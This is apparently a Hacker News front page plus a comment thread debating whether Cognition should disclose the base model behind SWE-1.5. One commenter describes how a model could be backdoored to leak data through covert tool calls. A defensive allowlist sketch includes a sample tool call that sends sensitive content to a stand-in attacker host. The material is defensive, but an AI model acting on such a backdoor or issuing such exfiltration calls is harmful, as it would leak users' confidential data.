frontpage.

Why there is no official statement from Substack about the data leak

https://techcrunch.com/2026/02/05/substack-confirms-data-breach-affecting-email-addresses-and-pho...
2•witnessme•3m ago•1 comment

Effects of Zepbound on Stool Quality

https://twitter.com/ScottHickle/status/2020150085296775300
1•aloukissas•6m ago•0 comments

Show HN: Seedance 2.0 – The Most Powerful AI Video Generator

https://seedance.ai/
1•bigbromaker•9m ago•0 comments

Ask HN: Do we need "metadata in source code" syntax that LLMs will never delete?

1•andrewstuart•15m ago•1 comment

Pentagon cutting ties w/ "woke" Harvard, ending military training & fellowships

https://www.cbsnews.com/news/pentagon-says-its-cutting-ties-with-woke-harvard-discontinuing-milit...
3•alephnerd•18m ago•1 comment

Can Quantum-Mechanical Description of Physical Reality Be Considered Complete? [pdf]

https://cds.cern.ch/record/405662/files/PhysRev.47.777.pdf
1•northlondoner•18m ago•1 comment

Kessler Syndrome Has Started [video]

https://www.tiktok.com/@cjtrowbridge/video/7602634355160206623
1•pbradv•21m ago•0 comments

Complex Heterodynes Explained

https://tomverbeure.github.io/2026/02/07/Complex-Heterodyne.html
3•hasheddan•21m ago•0 comments

EVs Are a Failed Experiment

https://spectator.org/evs-are-a-failed-experiment/
2•ArtemZ•33m ago•4 comments

MemAlign: Building Better LLM Judges from Human Feedback with Scalable Memory

https://www.databricks.com/blog/memalign-building-better-llm-judges-human-feedback-scalable-memory
1•superchink•33m ago•0 comments

CCC (Claude's C Compiler) on Compiler Explorer

https://godbolt.org/z/asjc13sa6
2•LiamPowell•35m ago•0 comments

Homeland Security Spying on Reddit Users

https://www.kenklippenstein.com/p/homeland-security-spies-on-reddit
3•duxup•38m ago•0 comments

Actors with Tokio (2021)

https://ryhl.io/blog/actors-with-tokio/
1•vinhnx•39m ago•0 comments

Can graph neural networks for biology realistically run on edge devices?

https://doi.org/10.21203/rs.3.rs-8645211/v1
1•swapinvidya•51m ago•1 comment

Deeper into the sharing of one air conditioner for 2 rooms

1•ozzysnaps•53m ago•0 comments

Weatherman introduces fruit-based authentication system to combat deep fakes

https://www.youtube.com/watch?v=5HVbZwJ9gPE
3•savrajsingh•54m ago•0 comments

Why Embedded Models Must Hallucinate: A Boundary Theory (RCC)

http://www.effacermonexistence.com/rcc-hn-1-1
1•formerOpenAI•56m ago•2 comments

A Curated List of ML System Design Case Studies

https://github.com/Engineer1999/A-Curated-List-of-ML-System-Design-Case-Studies
3•tejonutella•1h ago•0 comments

Pony Alpha: New free 200K context model for coding, reasoning and roleplay

https://ponyalpha.pro
1•qzcanoe•1h ago•1 comment

Show HN: Tunbot – Discord bot for temporary Cloudflare tunnels behind CGNAT

https://github.com/Goofygiraffe06/tunbot
2•g1raffe•1h ago•0 comments

Open Problems in Mechanistic Interpretability

https://arxiv.org/abs/2501.16496
2•vinhnx•1h ago•0 comments

Bye Bye Humanity: The Potential AMOC Collapse

https://thatjoescott.com/2026/02/03/bye-bye-humanity-the-potential-amoc-collapse/
3•rolph•1h ago•0 comments

Dexter: Claude-Code-Style Agent for Financial Statements and Valuation

https://github.com/virattt/dexter
1•Lwrless•1h ago•0 comments

Digital Iris [video]

https://www.youtube.com/watch?v=Kg_2MAgS_pE
1•vermilingua•1h ago•0 comments

Essential CDN: The CDN that lets you do more than JavaScript

https://essentialcdn.fluidity.workers.dev/
1•telui•1h ago•1 comment

They Hijacked Our Tech [video]

https://www.youtube.com/watch?v=-nJM5HvnT5k
2•cedel2k1•1h ago•0 comments

Vouch

https://twitter.com/mitchellh/status/2020252149117313349
41•chwtutha•1h ago•7 comments

HRL Labs in Malibu laying off 1/3 of their workforce

https://www.dailynews.com/2026/02/06/hrl-labs-cuts-376-jobs-in-malibu-after-losing-government-work/
4•osnium123•1h ago•1 comment

Show HN: High-performance bidirectional list for React, React Native, and Vue

https://suhaotian.github.io/broad-infinite-list/
2•jeremy_su•1h ago•0 comments

Show HN: I built a Mac screen recorder, Recap.Studio

https://recap.studio/
1•fx31xo•1h ago•1 comment

Cognition Releases SWE-1.5: Near-SOTA Coding Performance at 950 tok/s

https://cognition.ai/blog/swe-1-5
11•yashvg•3mo ago

Comments

swyx•3mo ago
(coauthor) xpost here: https://x.com/cognition/status/1983662836896448756

happy to answer any questions. i think my higher-level insight, to paraphrase McLuhan, is: "first the model shapes the harness, then the harness shapes the model". this is the first model that combines cognition's new gb200 cluster, cerebras' cs3 inference, and data from our evals work with {partners}, as referenced in https://www.theinformation.com/articles/anthropic-openai-usi...

CuriouslyC•3mo ago
In the interest of transparency, you should update your post with the model you fine-tuned; it matters.
swyx•3mo ago
this is not a question but an assertion that your values are more important than mine, with none of my context and none of your reasoning. do you see how this tone is an issue?

regardless of what i'm allowed to say, i will personally defend the view that the qualities of the base model you choose actually matter less and less as long as it's "good enough", because from there the RL/post-train qualities and data take over and are the entire point of differentiation

CuriouslyC•3mo ago
If you had enough tokens to completely wash out the parent's latent distribution, you would have just trained a new model instead of fine-tuning. That means, by definition, your model is still inheriting properties of the parent, and for your business customers, who want predictable, understandable systems, knowing those inherited properties is going to be useful.

I think the real reason is that it's a Chinese model (I mean, come on) and your parent company doesn't want any political blowback.
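
The inheritance point above can be checked empirically if you have both checkpoints. A minimal sketch, assuming two compatible PyTorch state dicts (the tensors below are toy stand-ins, not Cognition's or anyone's real weights): measure how far the fine-tune actually moved from its parent.

    import torch

    def relative_weight_delta(base_state: dict, tuned_state: dict) -> float:
        """Return ||tuned - base|| / ||base||, aggregated over shared tensors."""
        num = den = 0.0
        for name, base_w in base_state.items():
            tuned_w = tuned_state.get(name)
            if tuned_w is None or tuned_w.shape != base_w.shape:
                continue  # skip heads/embeddings that were resized or replaced
            num += (tuned_w.float() - base_w.float()).pow(2).sum().item()
            den += base_w.float().pow(2).sum().item()
        return (num / den) ** 0.5

    # Toy stand-ins; in practice you would torch.load(...) two real checkpoints.
    torch.manual_seed(0)
    base = {"layer.weight": torch.randn(512, 512)}
    tuned = {"layer.weight": base["layer.weight"] + 0.01 * torch.randn(512, 512)}
    print(f"relative delta: {relative_weight_delta(base, tuned):.4f}")  # ~0.01

A small delta is consistent with most of the parent's latent structure surviving post-training; it does not tell you which properties survived.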

luisml77•3mo ago
> you would have just trained a new model instead of fine-tuning

As if it doesn't cost tens of millions to pre-train a model. Not to mention the time it takes. Do you want them to stall progress for no good reason?

CuriouslyC•3mo ago
Originally I just wanted to know what their base model was, out of curiosity. Since they fired off such a friendly reply, now I want to know if they're trying to pass off a fine-tuned Chinese model to government customers who have directives to avoid Chinese models, with hand-waving about how it's safe now because they did some RL on it.
luisml77•3mo ago
I mean, I was going to say that was ridiculous, but now that I think about it more, it's possible that the models could be trained to, say, spy on government data by calling a tool to send the information to China. And some RL might not wipe out that behavior.

I doubt current models from China are trained to do smart spying / inject sneaky tool calls. But based on my deep learning experience with models, in both training and inference, it's definitely possible to train a model to do this in a very subtle and hard-to-detect way...

So your point is valid, and I think they should specify the base model to address security concerns, or conduct safety evaluations on it before shipping it to sensitive customers.
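
That kind of safety evaluation can start with something as simple as gating model-emitted tool calls behind an egress allowlist. A minimal sketch, assuming a JSON-style tool-call shape; the tool name, hosts, and call format here are all hypothetical, not any vendor's actual API:

    from urllib.parse import urlparse

    ALLOWED_HOSTS = {"api.internal.example", "docs.internal.example"}

    def egress_targets(tool_call: dict) -> list[str]:
        """Collect hostnames from any URL-valued argument in the call."""
        return [urlparse(v).hostname or ""
                for v in tool_call.get("arguments", {}).values()
                if isinstance(v, str) and v.startswith(("http://", "https://"))]

    def is_safe(tool_call: dict) -> bool:
        """Allow the call only if every network target is allowlisted."""
        return all(h in ALLOWED_HOSTS for h in egress_targets(tool_call))

    # The subtle exfiltration described above would be caught here:
    call = {"name": "http_post",
            "arguments": {"url": "https://telemetry.evil.example/upload",
                          "body": "<sensitive document>"}}
    assert not is_safe(call)

This is a first-line check, not a proof of safety: a model post-trained to exfiltrate could still smuggle data through an allowed host, which is why the base model's provenance matters in the first place.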

pandada8•3mo ago
very curious: which model can only run up to 950 tok/s even with cerebras?